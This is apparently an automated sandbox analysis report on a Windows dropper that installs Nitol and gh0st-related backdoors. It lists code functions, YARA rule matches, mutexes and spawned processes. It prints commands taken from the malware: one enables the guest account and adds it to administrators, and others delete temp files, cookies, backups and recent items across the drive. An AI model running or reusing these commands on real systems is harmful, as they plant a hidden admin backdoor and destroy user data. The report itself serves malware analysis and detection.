              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043ADF0
              Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CCJump to behavior
              Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to behavior
              Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\05CA35CCJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP8C35.tmp
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004046CA0_2_004046CA
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405FA80_2_00405FA8
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_004074702_2_00407470
              Source: C:\Windows\Temp\server.exeCode function: 3_2_004023C93_2_004023C9
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100378103_2_10037810
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100528163_2_10052816
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1005401A3_2_1005401A
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100440203_2_10044020
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100510293_2_10051029
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100430303_2_10043030
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100370403_2_10037040
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100418503_2_10041850
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002F0603_2_1002F060
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D0803_2_1001D080
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100360803_2_10036080
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C0903_2_1002C090
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100450903_2_10045090
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C8A03_2_1002C8A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002F8B03_2_1002F8B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100380B03_2_100380B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100348C03_2_100348C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100388C03_2_100388C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003F0C03_2_1003F0C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100678C03_2_100678C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100350E03_2_100350E0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100398F03_2_100398F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100518F13_2_100518F1
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100359003_2_10035900
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100409403_2_10040940
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100421703_2_10042170
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001C9903_2_1001C990
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002E9A03_2_1002E9A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100321B03_2_100321B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100369B03_2_100369B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100229C03_2_100229C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100289C03_2_100289C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004C1D03_2_1004C1D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100579D03_2_100579D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100302003_2_10030200
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100342003_2_10034200
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10042A003_2_10042A00
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100412203_2_10041220
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10017A303_2_10017A30
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003CA303_2_1003CA30
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10043A303_2_10043A30
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10031A403_2_10031A40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001DA503_2_1001DA50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040A503_2_10040A50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10018A703_2_10018A70
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10014A703_2_10014A70
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003EA803_2_1003EA80
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10054ABB3_2_10054ABB
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100312D03_2_100312D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003A2D03_2_1003A2D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002E2E03_2_1002E2E0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10032AE03_2_10032AE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001E2F03_2_1001E2F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100682F03_2_100682F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10037B103_2_10037B10
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003C3103_2_1003C310
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003BB203_2_1003BB20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004A3203_2_1004A320
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10041B203_2_10041B20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10030B403_2_10030B40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004F34F3_2_1004F34F
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C3503_2_1002C350
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100173603_2_10017360
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100383603_2_10038360
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D3703_2_1001D370
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003D3903_2_1003D390
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001ABA03_2_1001ABA0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100393A03_2_100393A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100563A03_2_100563A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004FBC53_2_1004FBC5
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004B3C03_2_1004B3C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100233F03_2_100233F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003DBF03_2_1003DBF0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100413F03_2_100413F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100534183_2_10053418
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1005141B3_2_1005141B
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100424203_2_10042420
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001543E3_2_1001543E
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040C403_2_10040C40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10034C703_2_10034C70
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001C4803_2_1001C480
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001ACA03_2_1001ACA0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100364B03_2_100364B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002DCC03_2_1002DCC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10035CC03_2_10035CC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100554E03_2_100554E0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100334F03_2_100334F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100544FD3_2_100544FD
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003AD003_2_1003AD00
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10015D103_2_10015D10
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001CD203_2_1001CD20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100355403_2_10035540
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003FD403_2_1003FD40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100345603_2_10034560
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C5703_2_1002C570
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10051DC73_2_10051DC7
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003CDC03_2_1003CDC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100415C03_2_100415C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100145D03_2_100145D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004A5D03_2_1004A5D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10016DE03_2_10016DE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10039DE03_2_10039DE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004CDE03_2_1004CDE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100505F73_2_100505F7
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10041DF03_2_10041DF0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040E003_2_10040E00
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10037E103_2_10037E10
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100386103_2_10038610
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001DE403_2_1001DE40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D6503_2_1001D650
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10038E503_2_10038E50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10022E603_2_10022E60
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10064E703_2_10064E70
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001568D3_2_1001568D
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003B6903_2_1003B690
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003C6A03_2_1003C6A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100656D03_2_100656D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10066EE03_2_10066EE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10033EF03_2_10033EF0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003F7003_2_1003F700
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10057F203_2_10057F20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100137303_2_10013730
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10063F303_2_10063F30
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100637603_2_10063760
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10046F903_2_10046F90
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040FC03_2_10040FC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001BFD03_2_1001BFD0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003A7D03_2_1003A7D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100287F03_2_100287F0
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_004074704_2_00407470
              Source: C:\Windows\Temp\ .exeCode function: 5_2_004330205_2_00433020
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00458C585_2_00458C58
              Source: C:\Windows\Temp\ .exeCode function: 5_2_004526555_2_00452655
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00447B9C5_2_00447B9C
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0044DDAB5_2_0044DDAB
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00443ED85_2_00443ED8
              Source: C:\Windows\Temp\ .exeCode function: String function: 00401B10 appears 2588 times
              Source: C:\Windows\Temp\ .exeCode function: String function: 0044991C appears 59 times
              Source: C:\Windows\Temp\ .exeCode function: String function: 00456F8E appears 53 times
              Source: C:\Windows\Temp\ .exeCode function: String function: 00454F3B appears 2661 times
              Source: C:\Windows\Temp\ .exeCode function: String function: 00459697 appears 31 times
              Source: C:\Windows\Temp\ .exeCode function: String function: 004483B0 appears 122 times
              Source: G3izWAY3Fa.exe, 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
              Source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.00000000031AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
              Source: G3izWAY3Fa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: dump.pcap, type: PCAPMatched rule: gh0st author = https://github.com/jackcr/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
              Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
              Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
              Source: v5.exe, 00000002.00000002.1384463004.0000000002DFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: .vBP%
              Source: classification engineClassification label: mal78.spre.bank.troj.spyw.evad.winEXE@155/6@4/3
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,3_2_10011F80
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA,5_2_0043A410
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043A500
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043AD30
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043ADF0
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041CD
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_00405244 LoadLibraryA,6CFC6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle,2_2_00405244
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,4_2_0040597D
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
              Source: C:\Windows\Temp\v5.exeMutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\Temp\server.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Users\user\AppData\Local\Temp\nsf2983.tmpJump to behavior
              Source: G3izWAY3Fa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: G3izWAY3Fa.exeReversingLabs: Detection: 86%
              Source: server.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile read: C:\Users\user\Desktop\G3izWAY3Fa.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
              Source: unknownProcess created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
              Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
